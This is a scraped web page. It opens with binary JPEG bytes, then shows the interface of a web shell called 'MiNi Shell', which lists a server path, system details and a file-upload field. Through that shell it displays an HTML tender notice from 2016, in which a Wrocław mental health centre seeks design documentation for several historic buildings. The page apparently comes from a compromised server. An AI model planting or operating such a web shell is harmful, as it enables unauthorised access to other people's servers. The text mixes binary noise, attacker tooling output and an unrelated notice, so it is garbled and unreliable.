JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160120/7467-N-2016.html

<p class="kh_header"><b>Wrocław: Postępowanie nr 6/PROJ/DCZP/2016/P na : Przygotowanie kompletnej dokumentacji projektowej i kosztorysowej wraz z niezbędnymi pozwoleniami dla budynków G, ,A, M i P  Dolnośląskiego Centrum Zdrowia Psychicznego  sp. z o.o.
oraz pełnienie obowiązków nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 7467 - 2016; data zamieszczenia: 20.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Zdrowia Psychicznego sp. z o.o. , ul. Wybrzeże Józefa Conrada-Korzeniowskiego 18, 50-226 Wrocław, woj. dolnośląskie, tel. 71 77 66 212, faks 71 77 66 200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dczp.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedsiębiorstwo prowadzące działalność leczniczą.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie nr 6/PROJ/DCZP/2016/P na : Przygotowanie kompletnej dokumentacji projektowej i kosztorysowej wraz z niezbędnymi pozwoleniami dla budynków G, ,A, M i P  Dolnośląskiego Centrum Zdrowia Psychicznego  sp. z o.o.
oraz pełnienie obowiązków nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przygotowanie kompletnej dokumentacji projektowej i kosztorysowej wraz z niezbędnymi pozwoleniami dla budynków G, A, M i P Dolnośląskiego Centrum Zdrowia Psychicznego  sp. z o.o. oraz pełnienie obowiązków nadzoru autorskiego obejmujący:
a)Zadanie nr 1: Przygotowanie kompletnej dokumentacji wraz z niezbędnymi pozwoleniami - dot. budynku G,
b)Zadanie nr 2: Przygotowanie kompletnej dokumentacji wraz z niezbędnymi pozwoleniami - dot. budynku A,
c)Zadanie nr 3: Przygotowanie kompletnej dokumentacji wraz z niezbędnymi pozwoleniami - dot. budynku M,
d)Zadanie nr 4: Przygotowanie kompletnej dokumentacji wraz z niezbędnymi pozwoleniami - dot. budynku P,
e)Zadanie nr 5: Przygotowanie kompletnej dokumentacji wraz z niezbędnymi pozwoleniami - wydzielenie dodatkowego pomieszczenia w obrębie Apteki Szpitalnej - dot. budynku G.
Szczegółowy zakres zamówienia określa pkt II.1.
II.1   Szczegółowy opis przedmiotu  zamówienia:
1)Zadanie nr 1: Przygotowanie kompletnej dokumentacji wraz z uzyskaniem niezbędnych pozwoleń - dot. budynku G - polegające na opracowaniu dokumentacji projektowej i kosztorysowej, (dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych) obejmującej remont drewnianej więźby dachowej, wymianę pokrycia dachu z blachy oraz remont ceglanej elewacji w budynku wpisanym do rejestru zabytków, wraz z niezbędnymi uzgodnieniami i opiniami oraz uzyskaniem na rzecz Zamawiającego decyzji o pozwoleniu na budowę wykonanie robót budowlanych. 
Dane budynku: powierzchnia użytkowa 5 949 m2, kubatura 44 786 m2, liczba kondygnacji 5.
Fundamenty ławowe ceglane, ściany murowane z cegły, stropy międzykondygnacyjne odcinkowe, więźba dachowa drewniana, połać dachu kryta blachą. 
Zadanie nr 2: Przygotowanie kompletnej dokumentacji wraz z uzyskaniem niezbędnych pozwoleń - dot. budynku A - polegające na opracowaniu dokumentacji projektowej i kosztorysowej, (dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych), obejmującej wymianę drewnianej stolarki okiennej, renowację drewnianej stolarki drzwiowej oraz remont ceglanej elewacji w budynku wpisanym do rejestru zabytków, wraz z niezbędnymi uzgodnieniami i opiniami oraz uzyskaniem na rzecz Zamawiającego decyzji o pozwoleniu na budowę  wykonanie robót budowlanych.
Dane budynku: powierzchnia użytkowa 1 239 m2, kubatura 5 642 m2, liczba kondygnacji 3.
Fundamenty ławowe ceglane, ściany murowane z cegły, stropy międzykondygnacyjne odcinkowe i drewniane, więźba dachowa drewniana, połać dachu kryta dachówką ceramiczną.
Zadanie nr 3: Przygotowanie kompletnej dokumentacji wraz z niezbędnymi pozwoleniami - dot. budynku M - polegające na opracowaniu programu funkcjonalno-użytkowego oraz sporządzenia na jego podstawie dokumentacji projektowej i kosztorysowej, wraz ze specyfikacją techniczną wykonania i odbioru robót budowlanych, obejmującej kompleksowy remont i przebudowę budynku wpisanego do rejestru zabytków, wraz z niezbędnymi uzgodnieniami i opiniami oraz uzyskaniem na rzecz Zamawiającego decyzji o pozwoleniu na budowę  wykonanie robót budowlanych. 
Zakres robót budowlanych przewidywanych do wykonania zawiera m.in. remont drewnianej więźby dachowej, wymianę pokrycia dachu z blachy, remont ceglanej elewacji, wymianę drewnianej stolarki okiennej, renowację drewnianej stolarki drzwiowej, wymianę części stropów międzykondygnacyjnych, remont lub wymianę schodów wewnętrznych, rozbiórkę i wznoszenie ścian, izolację poziomą i pionową ścian fundamentowych, wymianę instalacji elektrycznych i sanitarnych wraz z armaturą, wykończenie pomieszczeń.
Dane budynku: powierzchnia użytkowa 2 561 m2, kubatura 14 139 m2, liczba kondygnacji 3.
Fundamenty ławowe ceglane, ściany murowane z cegły, stropy międzykondygnacyjne odcinkowe i drewniane, więźba dachowa drewniana, połać dachu kryta blachą.
Planowane przeznaczenie budynku, co najmniej jako konieczne: 
-3 oddziały psychiatryczne niestacjonarne (każdy na 30 pacjentów), 
-1 oddział psychogeriatryczny niestacjonarny (na 30 pacjentów), 
-dzienny oddział terapii uzależnień, 
-poradnia zdrowia psychicznego, obejmująca co najmniej dyżurkę pielęgniarską, gabinet zabiegowy, pokoje socjalne, toalety, 3 gabinety psychologów, 4 gabinety lekarskie 
-oraz zaprojektowanie pozostałych pomieszczeń, celem optymalnego wykorzystania powierzchni budynku, których przeznaczenie odpowiadać będzie działalności statutowej Zamawiającego.
Projekt musi być zgodny z przepisami powszechnie obowiązującymi w zakresie Prawa budowlanego, rozporządzenia ww. z dnia 2 września 2004 r. oraz pozostałymi przepisami powszechnie obowiązującymi, regulującymi wykonywania działalności przez podmioty lecznicze, w tym w szczególności wymaganiom, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą tj. na dzień podpisania umowy rozporządzenie Ministra Zdrowia z dnia 26 czerwca 2012 r. (Dz. U. z 2012 r. poz. 739).
Zadanie nr 4: Przygotowanie kompletnej dokumentacji wraz z niezbędnymi pozwoleniami - dot. budynku P - polegające na opracowaniu ekspertyzy technicznej określającej przyczyny występowania zawilgoceń i wykwitów pleśni w przyziemiu budynku wpisanego do rejestru zabytków, wraz z określeniem czynności niezbędnych do ich usunięcia oraz sporządzeniem dokumentacji projektowej i kosztorysu inwestorskiego (wraz z specyfikacją techniczna wykonania i odbioru robót budowlanych). 
Dane budynku: powierzchnia użytkowa 204 m2, kubatura 1 265 m2, liczba kondygnacji 2.
Fundamenty ławowe ceglane, ściany murowane z cegły, stropy międzykondygnacyjne odcinkowe i WPS, więźba dachowa drewniana, połać dachu kryta blachą.
5)Zadanie nr 5: Przygotowanie kompletnej dokumentacji projektowej i kosztorysowej (dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych) wraz z niezbędnymi pozwoleniami - wydzielenie dodatkowego pomieszczenia w obrębie Apteki Szpitalnej - dot. budynku G.- polegające na opracowaniu dokumentacji projektowej i kosztorysowej, obejmującej wydzielenie pomieszczenia biurowego w obrębie istniejącej apteki w przyziemiu budynku G wraz z niezbędnymi uzgodnieniami i opiniami oraz uzyskaniem na rzecz Zamawiającego decyzji o pozwoleniu na budowę  wykonanie robót budowlanych pozwoleniu konserwatorskim.
Dokumentacja musi uwzględniać przepisy powszechnie obowiązujące regulujące wymagania dla apteki szpitalnej. 

Wszelkie niezbędne materiały, wnioski, uzgodnienia, opinie wymagane dla realizacji przedmiotu umowy, Wykonawca pozyskuje we własnym zakresie w ramach kosztów określonych w złożonej ofercie.
Zaleca się aby Wykonawca dokonał wizji lokalnej w terenie celem pozyskania informacji, które będą niezbędne do przygotowania i złożenia oferty oraz zawarcia umowy. koszty związane z przeprowadzeniem wizji i opracowania oferty ponosi wykonawca.
Pełną dokumentację, będącą wynikiem realizacji niniejszej umowy, dla każdego z zadań dokumentację projektową i kosztorysową wraz z przedmiarem robót należy wykonać w 4 egz. w wersji papierowej oraz na nośniku pamięci np. płycie CD. w wersji elektronicznej możliwej do odczytu w formatach doc. (do obróbki z możliwością kopiowania) oraz .pdf 
Wykonawca w ramach realizacji niniejszej umowy zobowiązany jest i przyjmuje w ramach swoich obowiązków realizacji niniejszej umowy, pełnić nadzór autorski, zgodnie z postanowieniami załączonego do SIWZ projektu umowy. 
Zamawiający udostępni Wykonawcy na potrzeby wykonania przedmiotu umowy niezbędną dokumentację będącą w jego posiadaniu.
Całość dokumentacji wykonanej w ramach realizacji przedmiotu zamówienia musi być  zgodna z przepisami powszechnie obowiązującymi, w tym w szczególności rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2013 r. poz. 1129), ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409, z późn. zm.), przepisami regulującymi wymagania dla podmiotów wykonujących działalność leczniczą i Polskimi Normami, a materiały zawarte w kosztorysach projektach muszą spełniać wymogi określone w przepisach Prawa budowlanego i ustawy z dnia 16 kwietnia2004 r. o wyrobach budowlanych (Dz. U. z 2014 r. poz. 883, z późn. zm.)
Dokumentacja projektowa opracowana na podstawie obowiązujących przepisów prawa, stanowić będzie podstawę do przeprowadzenia odrębnego postępowania w trybie ustawy - Prawo zamówień publicznych dla wyłonienia wykonawcy robót budowlanych objętych projektem..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówienia uzupełniającego na podstawie art. 67 ust. 1 pkt 5 i 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 270.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia zgodnie z przepisem art. 22 ust. 1 ustawy Pzp, według wzoru stanowiącego załącznik nr 2 do SIWZ oraz na podstawie złożonego dokumentu poświadczającego uprawnienia do wykonywania określonej działalności lub czynności.

Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego wykazu usług załącznik nr 3 do SIWZ.

Wykonawca ubiegający się o zamówienie musi wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum trzy usługi, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie. Wartość każdej podanej usługi musi opiewać minimum na taką kwotę, która zostanie podana w ofercie.  Co najmniej jedna usługa musi dotyczyć opracowania projektu remontu obiektu wpisanego do rejestru zabytków.  
Dowodami, o których mowa powyżej są:
a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert;
b)	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia. 

Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia zgodnie z przepisem art. 22 ust. 1 ustawy Pzp,  według wzoru stanowiącego załącznik nr 2 do SIWZ.
Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia zgodnie z przepisem art. 22 ust. 1 ustawy Pzp,  według wzoru stanowiącego załącznik nr 2 do SIWZ.
Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia zgodnie z przepisem art. 22 ust. 1 ustawy Pzp,  według wzoru stanowiącego załącznik nr 2 do SIWZ.
Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji zadania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dczp.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Zdrowia Psychiczneg Spółka z o. o.
z siedzibą ul. Wybrzeże J. C - Korzeniowskiego 18, 50-226 Wrocław, 
Dział Zamówień Infrastruktury i Logistyki, 
budynek A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2016 godzina 10:00, miejsce: Dolnośląskie Centrum Zdrowia Psychicznego spółka z ograniczoną odpowiedzialnością z siedzibą ul. Wybrzeże J. C Korzeniowskiego 18, 50-226 Wrocław -  Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com